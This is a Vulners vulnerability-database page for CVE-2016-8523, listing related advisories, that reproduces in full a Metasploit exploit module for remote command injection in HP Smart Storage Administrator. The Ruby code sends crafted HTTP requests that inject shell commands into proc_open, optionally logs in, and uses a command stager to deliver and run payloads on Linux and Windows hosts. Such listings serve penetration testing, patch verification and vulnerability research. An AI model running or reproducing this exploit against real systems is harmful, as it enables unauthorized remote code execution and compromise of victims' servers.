Vulners
Lucene search
HP Smart Storage Administrator 2.30.6.0 Remote Command Injection
🗓️ 10 Feb 2017 00:00:00Reported by Nicolas MattioccoType 
packetstorm🔗 packetstormsecurity.com👁 72 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection Exploit | 10 Feb 201700:00 | – | zdt |
 | CVE-2016-8523 | 10 Feb 201700:00 | – | circl |
 | HP Smart Storage Administrator Remote Code Execution Vulnerability | 14 Feb 201700:00 | – | cnvd |
 | HPE Smart Storage Administrator Code Execution (CVE-2016-8523) | 14 Jun 201700:00 | – | checkpoint_advisories |
 | CVE-2016-8523 | 15 Feb 201822:00 | – | cve |
 | CVE-2016-8523 | 15 Feb 201822:00 | – | cvelist |
 | HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit) | 10 Feb 201700:00 | – | exploitdb |
 | HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit) | 10 Feb 201700:00 | – | exploitpack |
 | HPE Smart Storage Administrator < 2.60.18.0 RCE | 21 Mar 201700:00 | – | nessus |
 | CVE-2016-8523 | 15 Feb 201822:29 | – | nvd |
10
`#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "HP Smart Storage Administrator Remote Command Injection",
'Description' => %q{
This module exploits a vulnerability found in HP Smart Storage Administrator. By
supplying a specially crafted HTTP request, it is possible to control the
'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Mattiocco (@MaKyOtOx)' # Discovery & multi-platform Metasploit module
],
'References' =>
[
['CVE', '2016-8523']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => %w{ linux win },
'Targets' =>
[
['Linux', {
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'bourne'
}],
['Linux (x64)', {
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'bourne'
}],
['Windows', {
'Platform' => 'win',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'certutil'
}],
['Windows (x64)', {
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'certutil'
}],
],
'Privileged' => false,
'DisclosureDate' => "Jan 30 2017"
))
register_options(
[
Opt::RPORT(2381),
# USERNAME/PASS may not be necessary, because the anonymous access is possible
OptString.new("USERNAME", [false, 'The username to authenticate as']),
OptString.new("PASSWORD", [false, 'The password to authenticate with'])
], self.class)
end
def check
@cookie = ''
sig = Rex::Text.rand_text_alpha(8)
cmd = "&echo%20#{sig}&echo"
res = send_command(cmd, true)
if not res
vprint_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.code == 200 && res.headers.to_s() =~ /#{sig}/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
cookie = ''
res = send_request_cgi({
'method' => 'POST',
'uri' => '/proxy/ssllogin',
'vars_post' => {
'redirecturl' => '',
'redirectquerystring' => '',
'user' => username,
'password' => password
}
})
if not res
fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
end
# CpqElm-Login: success
if res.headers['CpqElm-Login'].to_s =~ /success/
cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
end
cookie
end
def setup_stager
execute_cmdstager(:temp => './', :linemax => 2800)
end
def execute_command(cmd, opts={})
res = send_command(cmd, false)
if res && res.code != 200
vprint_error("Unexpected response:\n#{res}")
fail_with(Failure::Unknown, "There was an unexpected response")
end
end
def send_command(cmd, check)
if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
@cookie = login
if @cookie.empty?
fail_with(Failure::NoAccess, "#{peer} - Login failed")
else
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
end
end
req_opts = {}
# For the check() function, use GET method
if check
req_opts['uri'] = "/HPSSA/index.htm#{cmd}"
req_opts['method'] = "GET"
else
req_opts['uri'] = "/HPSSA/index.htm"
req_opts['method'] = "POST"
req_opts['vars_post'] = {'msf'=>'red'}
case target.opts['Platform']
when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""
when "win" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""
end
end
unless @cookie.empty?
browser_chk = 'HPSMH-browser-check=done for this session'
curl_loc = "curlocation-#{datastore['USERNAME']}="
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
end
send_request_cgi(req_opts)
end
def exploit
@cookie = ''
setup_stager
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Feb 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.30312